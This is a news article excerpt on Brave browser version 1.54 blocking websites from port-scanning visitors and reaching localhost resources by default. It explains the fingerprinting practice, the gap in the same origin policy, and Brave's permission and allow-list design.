Starting in version 1.54, Brave will automatically block website port scanning, a practice that a surprisingly large number of sites were found engaging in a few years ago. According to this list compiled in 2021 by a researcher who goes by the handle G666g1e, 744 websites scanned visitors’ ports, most or all without providing notice or seeking permission in advance. eBay, Chick-fil-A, Best Buy, Kroger, and Macy’s were among the offending websites.
Some sites use similar tactics in an attempt to fingerprint visitors so they can be re-identified each time they return, even if they delete browser cookies. By running scripts that access local resources on the visiting devices, the sites can detect unique patterns in a visiting browser. Sometimes there are benign reasons a site will access local resources, such as detecting insecurities or allowing developers to test their websites. Often, however, there are more abusive or malicious motives involved.
The new version of Brave will curb the practice. By default, no website will be able to access local resources. More advanced users who want a particular site to have such access can add it to an allow list.
[…]
Brave will continue to use filter list rules to block scripts and sites known to abuse localhost resources. Additionally, the browser will include an allow list that gives the green light to sites known to access localhost resources for user-benefiting reasons.
“Brave has chosen to implement the localhost permission in this multistep way for several reasons,” developers of the browser wrote. “Most importantly, we expect that abuse of localhost resources is far more common than user-benefiting cases, and we want to avoid presenting users with permission dialogs for requests we expect will only cause harm.”
The scanning of ports and other activities that access local resources is typically done using JavaScript that’s hosted on the website and runs inside a visitor’s browser. A core web security principle known as the same origin policy bars JavaScript hosted by one Internet domain from accessing the data or resources of a different domain. This prevents malicious Site A from being able to obtain credentials or other personal data associated with Site B.
The same origin policy, however, doesn’t prevent websites from interacting in some ways with a visitor’s localhost IP address of 127.0.0.1.
[…]
“As far as we can tell, Brave is the only browser that will block requests to localhost resources from both secure and insecure public sites, while still maintaining a compatibility path for sites that users trust (in the form of the discussed localhost permission)” the Brave post said.